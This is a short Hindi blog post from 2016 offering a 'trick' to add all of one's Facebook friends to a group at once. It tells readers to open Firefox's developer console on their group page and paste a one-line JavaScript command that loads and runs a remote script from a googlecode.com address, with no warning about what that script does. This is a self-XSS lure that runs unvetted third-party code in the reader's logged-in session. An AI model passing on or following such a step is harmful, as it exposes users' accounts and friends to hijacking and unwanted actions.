Monday, February 29, 2016

अपने फेसबुक ग्रुप में सारे दोस्तों को एक साथ जोड़ें

दोस्तों आज के इस दौर मैं हर कोई फेसबुक चलता है क्योंकि फेसबुक आसान भी है लोकप्रिय भी। दोस्तों फेसबुक में कई दोस्त अपना ग्रुप तो बना लेते है लेकिन उनमे अपने दोस्तों को जोड़ना टेडी खीर हो जाता है आज मैं अपने दोस्तों के लिए ऐसी ट्रिक लेकर आये हूँ जिस से आप अपने सारे दोस्तों को एक साथ अपने ग्रुप में जोड़ सकते हो 


ये तरकीब बहुत आसान है लेकिन सिर्फ firefox ब्राउज़र में ही चलती है 

सबसे पहले firefox ब्राउज़र में जाकर अपने ग्रुप को खोलो 

फिर Ctrl + Shift +k एक साथ दबाओ 
आप के ब्राउज़र में एक नया कॉलम खुल जायेगा 

फिर आप ये लिंक वहाँ पर पेस्ट कर दीजिये 
document.body.appendChild(document.createElement('script')).src='http://group-invites.googlecode.com/files/group-invite.js';

फिर Enter  दबा दीजिये आपके सारे दोस्त आपके ग्रुप में जुड़ जायेंगे 

0 comments:

Post a Comment